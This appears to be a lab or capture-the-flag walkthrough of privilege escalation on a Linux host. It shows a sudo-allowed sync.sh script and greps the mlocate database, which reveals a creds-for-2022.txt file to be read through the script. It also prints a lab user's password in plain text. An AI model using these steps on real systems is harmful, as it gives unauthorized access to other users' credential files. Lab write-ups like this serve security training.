InfoSec LAB

Marketing_sudo_privileges_t.miller

Created: 2 min read

t.miller

Checking for sudo privileges of the t.miller user after making the lateral movement

t.miller@marketing:~$ sudo -l
[sudo] password for t.miller: EzPwz2022_dev1$$23!!
Matching Defaults entries for t.miller on marketing:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User t.miller may run the following commands on marketing:
    (m.sander) /usr/bin/sync.sh

The t.miller user is able to execute /usr/bin/sync.sh as the m.sander user

/usr/bin/sync.sh

t.miller@marketing:~$ ll /usr/bin/sync.sh
-rwxr-xr-x 1 root root 386 Jul 13  2022 /usr/bin/sync.sh*
 
 
t.miller@marketing:~$ cat /usr/bin/sync.sh
#! /bin/bash
 
if [ -z $1 ]; then
    echo "error: note missing"
    exit
fi
 
note=$1
 
if [[ "$note" =~ .*m.sander.* ]]; then
    echo "error: forbidden"
    exit
fi
 
difference=$(diff /home/m.sander/personal/notes.txt $note)
 
if [[ -z $difference ]]; then
    echo "no update"
    exit
fi
 
echo "Difference: $difference"
 
cp $note /home/m.sander/personal/notes.txt
 
echo "[+] Updated."

This bash script performs the following;

  • takes an argument and compare it to the /home/m.sander/personal/notes.txt file using diff
  • If there is a difference, it shows the difference and the argument’s content is appended to the /home/m.sander/personal/notes.txt file

Execution Flow

t.miller@marketing:/var/tmp$ echo supersecret > test
t.miller@marketing:/var/tmp$ sudo -u m.sander /usr/bin/sync.sh ./test 
Difference: 1,3c1
< == NOTES ==
< - remove vhost from website (done)
< - update to newer version (todo)
\ No newline at end of file
---
> supersecret
[+] Updated.

Like so It would be possible to copy and read files that are only accessible to the m.sander user

mlocate Group

t.miller@marketing:/var/tmp$ id
uid=1000(t.miller) gid=1000(t.miller) groups=1000(t.miller),24(cdrom),46(plugdev),50(staff),100(users),119(mlocate)

Checking back at group membership of the t.miller user, mlocate is present

mlocate is a Linux utility that maintains a database of file paths and enables fast file searches using the locate command. It updates its database efficiently with updatedb, providing quick lookups while respecting file permissions for security.

t.miller@marketing:/var/tmp$ find / -group mlocate -ls -type f 2>/dev/null
   546950   4868 -rw-r-----   1 root     mlocate   4981603 Jul 13  2022 /var/lib/mlocate/mlocate.db
    45184     48 -rwxr-sr-x   1 root     mlocate     47344 Jul 16  2019 /usr/bin/mlocate

/var/lib/mlocate/mlocate.db is the database file It should contain a lot of files. Pretty much all the files in the system.

t.miller@marketing:/var/tmp$ grep -a -w m.sander /var/lib/mlocate/mlocate.db

Checking the database for the m.sander user reveals an interesting file located under the /home/m.sander/personal directory alongside the notes.txt file; creds-for-2022.txt Leveraging the copy and read capabilities of the /usr/bin/sync.sh file, it would be possible to read the content.

Interactive Graph View

Backlinks